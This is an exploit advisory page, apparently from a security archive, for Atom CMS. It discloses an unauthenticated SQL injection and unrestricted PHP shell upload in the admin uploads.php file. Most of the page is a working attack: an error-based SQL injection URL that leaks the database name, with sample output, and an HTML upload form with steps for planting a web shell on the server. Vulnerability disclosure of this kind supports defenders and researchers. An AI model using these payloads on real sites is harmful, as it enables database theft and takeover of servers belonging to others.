what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Atom CMS Shell Upload / SQL Injection

Atom CMS Shell Upload / SQL Injection
Posted Jul 7, 2014
Authored by Jagriti Sahu

Atom CMS suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
SHA-256 | 3367d61b49a725f65775627f3fdafe186679e76b1405180e66b728a04893df9a

Atom CMS Shell Upload / SQL Injection

Change Mirror Download
##################################################################################################
#Exploit Title : Atom CMS SQL Injection and file upload vulnerability
#Author : Jagriti Sahu
#Vendor : https://github.com/thedigicraft/Atom.CMS
#Date : 07/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
Atom CMS suffers from remote SQL injection and php shell
uploadvulnerability.
both vulnerabilities are of high risk, SQL injection will expose data
stored in database whereas unrestricted file upload will cause php shell
on server

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to /admin/uploads.php file in which there is no
check who is accessing it(this file is only for admin user but a guest
user can also access it)
parameter $_GET[ 'id' ] is not getting filtered before supplying its
data to sql queries which arising sql injection exploit
and avatar image upload code is not checking whether file is an image
or other kind of file which leads to php shell upload


///////////////////////
/// exploit code ////
///////////////////////


SQL injection exploitation
==========================

http://127.0.0.1/acms/admin/uploads.php?id=1 and(select 1 FROM(select
count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

in result you will get database name in last line of the message on the
page

UPDATE users SET avatar = '1404709440490.' WHERE id = 1 and(select 1
FROM(select count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Duplicate entry 'acms1' for key 'group_key'


File upload exploitation
==========================


<form action="http://127.0.0.1/atom_cms/admin/uploads.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="exploit">
</form>


save this code on your machine as exploit.html
open it with web browser
brows your shell and click "exploit" button
shell will be under directory

http://127.0.0.1/atom_cms/uploads/

/////////////////////
end of exploit code
////////////////////
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close